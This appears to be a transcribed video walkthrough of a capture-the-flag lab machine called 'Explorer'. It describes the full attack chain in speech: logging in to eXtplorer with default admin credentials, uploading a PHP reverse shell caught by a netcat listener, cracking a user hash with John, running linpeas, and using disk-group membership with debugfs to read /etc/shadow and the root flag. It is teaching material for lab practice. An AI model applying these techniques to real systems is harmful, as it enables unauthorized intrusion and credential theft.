Hello everyone. So we will be starting Explorer machine. So let's run nmap scan for the same. So I'm just replacing here my IP address and I love scanning all the ports because we never know like on what port which service is running. So now let's visit browser. This is the machine Explorer. Now let's come on the new tab and I just pasted the IP address. So now this is loading. Okay, fine. So meanwhile it's loading, like let's press enter and see how much time it will be taking. So 50%. Okay. So this is taking more time. And okay, so even like here also like we are seeing that okay, perfect. So this is able to open. This means the web interface is running onto port number 80. Fine. So now if I am doing let's go, so this is a page which I am getting. Okay. So firstly, let's enumerate other directories as well. So this nmap scan, okay, 90% is done. So meanwhile it's happening here, I am going to a new tab and I'm using dirp for for the directory searching. Now let's see. So I have not given any word list on my end. I have just kept the default one for the same. So now let's see. Okay. So this is quite fast. Yes. Okay. So yeah. So here we have got one directory which is file manager. So let's visit this. So I'm just doing control and then enter. I'm just doing control C. Now let's open the link. So this is the page which I'm getting eXtplorer. Okay. So firstly, whenever we are given any login page, we'll firstly be giving default ID and password and let's see if it's opening or not. So let's try with admin and see if it will work or not. Okay, perfect. So by giving admin, we are able to log in. That's amazing. And here I can see that I have two users, admin and Dora. I'm not sure, but it's written here like users. So yes, there are two users, admin and Dora. So let's close it. Okay. Now what to do? So since it's a file manager, so let's open this. And here I have config ftp temp images include languages. So now here if I am opening configuration, htxs.ht users php bookmarks explorer. Okay, now let's open this ht users.php. Okay, so let's see what we have. Okay, so here we have admin and we have some hash value. Then below also we have dora and some hash value. So maybe it is the password for the same. Okay, so all right. Now I'll just see the results. So here only port 22 and port 80 is open. All right, so that's fine. Okay, so now what to do? So like this is the file manager and let's go back to the directory. Now here if I'm clicking on to WordPress, let's go back onto directory. If I am clicking on WordPress, let's see like what I have here. So here I have WP admin, WP content. Okay, understood. So like here, if I am replacing something, let's say if I am giving WordPress. Okay, so this is the WordPress page. Okay, so we can just give here directly. Now I am creating one reverse shell and I will be uploading that here. So let's do nano and then rev. shell.php. Now let's come to browser and let's come to hack tools. So my PC IP is 45.211. It's all perfect. Now let's come on to PHP. This pentest monkey reverse shell I am doing copy. Now let's come here. See, I can paste here also. So I can upload to, I can see like if there is any option to upload. But like why to make it more complex, I can just go here and I can make a file directly. Like I guess that's better. So here I am, and then I'm just seeing like where is the option to make a file. So okay, so like new file, then just give it the name reshell.php, and now it's create. So reshell.php, let's open this. I just pasted the reverse shell payload here and then just save it. Now I'm here. Let's close it. Now I am starting my netcat listener. So LNVP, and what port number I set here. So here it's 4444. Okay. So 4444, and then let's replace file manager and then give reshell.php. Now, okay, perfect. So we have got the initial foothold. So here, if I am asking who am I, so I am www data. So now let's come here and let's go to this hack tools and let's set up the and let's try to get the stable shell. So I am just copying it. Now here I am just pasting, and then it's perfect. We have got the initial foothold. Now let's go to the home directory and so cd home ls. I have Dora. Let's go inside Dora ls. I have local, so let's do local.txt. So we are not able to we are not able to see this local because if I'll show you like to see this local.txt, you need to be Dora. So now how to see the password for the same? So now we saw earlier, like if I'll just type file manager here again, file manager, and then let's do okay. Let's close it. Let's close it. Now inside this file manager, I have this configuration file. Then I have users.php, and then in this admin, so this is the hash for the same. If you will be checking this hash onto crack station, this is same admin value. Now below we are having this Dora hash. So I am just copying this, so we can just check it onto any other hash cracking tool as well. So for now we can use John because John is very simple to use. Since I have already cracked this hash earlier, so you will not be able to see the cracked hash value, but I'll show you like how you have to do this. So you firstly make the file nano and then just give hash.txt. Now paste your hash value here, then just save it. Now use John and then give your hash value hash.txt, then give hyphen hyphen word list equal to, and then give user share word lists, and then just give rockq.txt, the default one. Now, yes, so since I have already converted this, so we are not seeing here, but you will be seeing in your PCs that here the cracked value is Doraemon. Okay, so the password of machine like this user Dora is Doraemon. So now I am just doing Dora, and here I am doing Doraemon, and let's ask who am I. So I am now Dora. So now again, I have to take the TTY. I'll be just pasting the tty spawn shell payload here. So let's come up, go to hack tools, and then from here tty spawn shell, and then just copy this one. Now let's paste here. Perfect. So now I have got the stable shell. Now if I am just coming inside home dora, and then I am doing cat local.txt. So this is the local flag which we are getting. Okay. Now I am just checking like what all permission this Dora is having. So Doraemon. So we can see that user Dora may not run sudo on localhost. Okay. No issues. So now we can try running linpies here, and let's see like if we are able to find any misconfiguration or no. So now onto my desktop, I already have linpiece.sh file. So what I'm doing here, I am starting the Python server here. So Python 3 hyphen m http.server 8888. So like Python server is started here. Now I am going inside my tmp folder and I am installing linpiece. So wget http, and my kali ip is 192.168 dot 45 dot 211, and then it's 8888, and then it's linpiece dot sh. So linpiece is perfectly installed here. Now we have to give the permission, so I'm just doing chmod plus x and then linpiece dot sh. So it is having the permission to execute now. Now let's start your linpiece and let's see linpiece dot sh. So now I'm just seeing, see, so whenever you are analyzing the result, just keep an eye on to each and every line. So I'm seeing that operating system is Linux version 5.4.0 146 generic, and we can see that UID 1000 Dora GID groups disk. Okay, see, so now this seems to be a bit fishy because this user Dora is a part of this group. So we'll be just visiting the browser and let's see. Yeah. So disk group priv escalation. So we have a link that is disk group privilege escalation by hacking articles. So I'm just scrolling down, and we're just seeing. So, since we are in the system, we can use ID to verify the groups that the user belongs to. Okay, so now we saw there that user Dora belongs to the disk group. So now we will be running this command firstly. So I am just doing enter, and I'm just doing df-h. Okay, now what to do? Now here we are going to consider the partition root directories mounted to the first one which they saw here. So now if I'll just see here, so now here like root directory is mounted to this. Root directory is mounted to dev mapper ubuntu vg ubuntu lv. Okay. Okay. Fine. So now let's go up, and here I can see like after creating a, so now what to do, now we have to firstly, okay, this is fine. Then after selecting the partition, we can now examine and modify it using debugfs. So we can just run this command debugfs, and then we have to give the name of the directory which is mapped to the root partition, this one. So simply copy it, and then I am just doing debug fs, and now this one. So now I am in this mode, and now we can do mkdir and then test. So now file system open, read only. Okay. Now let's come down. So we can just see, since we are able to, okay, now let's go up. So now we can just do cat. Okay. Now I am doing cat etc. Okay, so let's see if, firstly, let's ask it like who am I. It's not the valid request. Let's see cat and etc password. So sorry, it's cat etc password. So okay, here I can say this perfect. Now if I am running, um, let me just try etc shadow. Okay, perfect. So we are able to access shadow file as well. So now like we can just use unshadow command, and we can just try to find out like what this password actually is, and then we can log in as the root. So now what I can do is, let me just try this. So cat root and then proof.txt, because by default the root flag is stored in root.txt file. Okay, perfect. So here we have got the root flag, and yeah. Now, so I am giving you one homework question, that this password which you are getting, this one, you have to use unshadow and just try to find out like what is this hash value. Okay. So by this method we have solved this machine. We have found both root flag as well as the local flag. So thank you everyone. Let's meet in the next video where we shall be solving more challenges. So yeah. Thank you.